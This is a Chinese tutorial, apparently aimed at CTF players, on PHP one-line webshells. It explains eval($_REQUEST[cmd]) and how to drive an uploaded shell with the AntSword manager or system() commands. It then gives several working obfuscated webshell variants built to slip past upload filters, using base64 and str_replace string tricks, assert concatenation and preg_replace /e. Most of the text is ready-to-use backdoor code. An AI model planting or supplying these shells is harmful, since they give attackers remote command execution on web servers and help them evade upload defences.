一、最简单的一句话木马
<?php eval($_REQUEST[cmd]); ?>
1. <?php
和 ?>
<?php
和?>
是 PHP 代码的开始和结束标记,表示 PHP 代码块的范围。
2. eval()
eval()
是 PHP 中的一个内建函数,用来执行字符串类型的 PHP 代码。它会将传入的字符串当作 PHP 代码进行解析和执行。- 由于
eval()
可以执行任意 PHP 代码,因此它通常被视为潜在的安全风险,尤其是在它接收来自外部输入的数据时。
3. $_REQUEST[cmd]
$_REQUEST
是 PHP 中的一个超全局数组,它包含了通过 HTTP 请求(如GET
、POST
或COOKIE
)传递的数据。cmd
是$_REQUEST
数组中的一个索引,表示请求中传递的参数名称。也就是说,这段代码期望在请求中传递一个名为cmd
的参数,并且cmd
的值将作为eval()
函数的输入。
二、木马的使用方式:
1.使用webshell管理工具连接:
比如蚁剑:
成功上传一个一句话木马
打开蚁剑,右键添加数据:
填入木马的地址(使用https可能连接失败,最好使用http)和密码(中括号‘[]’里的就是密码),编码器使用默认的就行。可以测试连接,然后点击添加。
双击下面这个刚刚添加的数据,可以进入目标的文件目录。一般来说,ctf比赛中,flag中根目录(/)下的/flag里或者/var/www/html下的flag.php里。
2.访问木马get或者post传参使用
system():执行系统命令函数,里面的参数是系统命令。注意末尾要加分号;(英文的)。先找到flag,然后再使用cat或者tac查看。
三、对木马内容进行防检测处理
一般来说,在可以进行上传文件的地方会有很多检验和过滤,这里分享一些常见的针对文件内容的防止检查的木马。
<?php $mt="mFsKCleRfU"; $ojj="IEBleldle"; $hsa="E9TVFsnd2VuJ10p"; $fnx="Ow=="; $zk = str_replace("d","","sdtdrd_redpdldadcde"); $ef = $zk("z", "", "zbazsze64_zdzeczodze"); $dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); $zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); $zvm(); ?> //pass is wen
<?php $a="ass"; $b="ert"; $c=$a.$b; $c($_POST[cmd]); ?>
<?php $item['wind'] = 'assert'; $array[] = $item; $array[0]['wind']($_POST['cmd']);?>
<?php @preg_replace("/[copyright]/e",$_POST['c'],"error");?>
<?php
$uf="snc3"; //pass is sqzr
$ka="IEBldmFbsK";
$pjt="CRfUE9TVF";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice");
$iqw="F6ciddKTs=";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw))); $mpy();
?>